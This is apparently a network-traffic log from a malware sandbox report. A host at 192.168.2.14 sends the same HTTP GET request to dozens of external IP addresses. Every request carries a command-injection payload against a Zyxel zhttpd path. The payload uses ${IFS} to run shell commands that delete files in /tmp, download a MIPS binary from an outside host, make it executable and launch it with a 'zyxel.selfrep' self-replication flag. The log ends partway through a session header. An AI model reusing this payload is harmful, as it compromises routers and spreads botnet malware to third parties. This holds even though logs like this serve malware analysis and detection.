                                      Jan 19, 2024 17:29:21.546513081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1683192.168.2.1444886199.160.139.164443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.546518087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1684192.168.2.1444994216.179.88.233443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.546575069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1685192.168.2.145413439.138.120.116443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.546601057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1686192.168.2.1460854108.186.111.229443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.546638966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1687192.168.2.1454088194.30.241.248443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.546652079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1688192.168.2.1459582198.211.29.183443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.546721935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1689192.168.2.1453052204.110.105.53443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.546751976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1690192.168.2.145151898.229.252.132443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.546782970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1691192.168.2.1450558177.35.35.154443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.546801090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1692192.168.2.1444950207.151.77.112443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.546834946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1693192.168.2.1435512146.189.14.100443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.546885967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1694192.168.2.145979482.32.194.88443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.546926975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1695192.168.2.14558541.129.195.74443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.546973944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1696192.168.2.143292227.73.79.208443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.546987057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1697192.168.2.1433580181.188.127.135443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.547027111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1698192.168.2.1455754120.127.176.35443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.547066927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1699192.168.2.1453902201.89.89.184443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.547101974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1700192.168.2.1455044196.120.233.107443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.547118902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1701192.168.2.14407602.151.70.147443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.547179937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1702192.168.2.145853242.105.192.110443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.547216892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1703192.168.2.145904246.127.62.164443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.547223091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1704192.168.2.1442008213.192.68.49443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.547259092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1705192.168.2.1451094110.254.11.3443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.547287941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1706192.168.2.1455530201.204.150.125443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.547327995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1707192.168.2.145227876.1.67.113443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.547349930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1708192.168.2.1446220209.175.136.230443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.547374964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1709192.168.2.1459168205.17.193.22443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.547422886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1710192.168.2.144430285.142.12.168443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.547483921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1711192.168.2.1446356103.25.182.235443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.547492027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1712192.168.2.1451652100.179.17.86443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.547580957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1713192.168.2.1434146143.106.194.168443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.547580957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1714192.168.2.143635839.108.190.135443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.547590017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1715192.168.2.1457672176.41.19.178443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.547636986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1716192.168.2.145342052.152.14.206443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.547719002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1717192.168.2.1448462117.90.181.165443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.547724009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1718192.168.2.144966651.122.41.152443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.547786951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1719192.168.2.1434736114.4.73.170443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.547791958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1720192.168.2.1445480209.9.133.14443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.547832012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1721192.168.2.1436116114.175.91.59443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.547849894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1722192.168.2.145722820.164.76.74443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.547879934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1723192.168.2.145588463.236.156.26443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.547918081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1724192.168.2.1442146207.106.76.205443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.547977924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1725192.168.2.144099482.221.160.217443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.547996044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1726192.168.2.143709671.42.84.48443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.548023939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1727192.168.2.143544618.91.12.61443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.548044920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1728192.168.2.145376642.230.203.161443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.548094988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1729192.168.2.1433654210.0.201.153443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.548130989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1730192.168.2.14335984.248.37.154443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.548160076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1731192.168.2.145702478.147.242.53443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.548199892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1732192.168.2.146082096.219.103.125443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.548239946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1733192.168.2.1443462166.23.247.73443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.548300028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1734192.168.2.1455756150.28.206.194443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.548310995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1735192.168.2.143815686.73.28.138443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.548358917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1736192.168.2.145934270.165.158.250443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.548397064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1737192.168.2.1435566206.94.50.187443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.548439026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1738192.168.2.1433344153.183.171.215443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.548440933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1739192.168.2.1439046152.238.228.93443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.548449039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1740192.168.2.1443310171.53.4.115443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.548502922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1741192.168.2.145144499.102.181.132443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.548564911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1742192.168.2.143648859.89.162.25443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.548597097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1743192.168.2.143491669.103.175.161443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.548641920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1744192.168.2.143711272.36.212.193443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.548686981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1745192.168.2.1438152189.77.202.97443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.548718929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1746192.168.2.144461690.234.51.81443
                                      TimestampBytes transferredDirectionData
